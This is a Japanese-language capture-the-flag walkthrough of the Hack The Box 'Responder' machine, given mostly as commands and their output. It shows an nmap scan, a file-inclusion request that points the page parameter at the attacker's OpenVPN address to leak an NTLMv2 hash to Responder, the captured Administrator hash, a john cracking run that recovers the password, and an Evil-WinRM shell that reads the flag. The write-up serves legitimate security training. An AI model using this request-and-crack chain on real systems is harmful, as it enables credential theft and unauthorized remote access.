nmap -v -A -p1-65535
IP アドレスを入力してアクセスし、このドメインにリダイレクトされます
unika.htb
リダイレクトされたことがわかりました。etc/hosts に IP とアドレスを追加します
10.129.242.179 unika.htb
追加した後、再度アクセスします
http://unika.htb/index.php?page=//openvpn 取得したアドレス /somefile
responder がハッシュを取得しました
[+] イベントをリッスン中...
[SMB] NTLMv2-SSP クライアント : ::ffff:10.129.242.179
[SMB] NTLMv2-SSP ユーザー名 : RESPONDER\Administrator
[SMB] NTLMv2-SSP ハッシュ : Administrator::RESPONDER:670a9ba6d2d4003d:1F8CF2050B31A2B3CD345CC04A6B403F:010100000000000000E161B09583D801F933966B23CD585000000000020008004B00560031004B0001001E00570049004E002D004900340053003900320049005A00430038004800540004003400570049004E002D004900340053003900320049005A0043003800480054002E004B00560031004B002E004C004F00430041004C00030014004B00560031004B002E004C004F00430041004C00050014004B00560031004B002E004C004F00430041004C000700080000E161B09583D8010600040002000000080030003000000000000000010000000020000076AEB5FC3A14CEDDAF3875BA92BAD2FFE8CA3BE1647E63F269BA7CE6327456740A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310036002E00370037000000000000000000
ローカルに保存し、john でクラックします
┌──(kali ㉿ kali)-[~]
└─$ john hash1.txt -w=/usr/share/wordlists/rockyou.txt
デフォルトの入力エンコーディングを使用: UTF-8
1 つのパスワードハッシュを読み込みました (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
4 つの OpenMP スレッドを実行します
'q' または Ctrl-C を押して中止、ほぼ他の任意のキーでステータスを表示
badminton (Administrator)
1g 0:00:00:00 完了 (2022-06-19 08:06) 50.00g/s 204800p/s 204800c/s 204800C/s slimshady..oooooo
すべてのクラックされたパスワードを確実に表示するには、"--show --format=netntlmv2" オプションを使用してください
セッションが完了しました。
Evil-WinRM PS C:\Users\mike\Desktop> cat flag.txt
ea81b7afddd03efaa0945333ed147fac
Evil-WinRM PS C:\Users\mike\Desktop>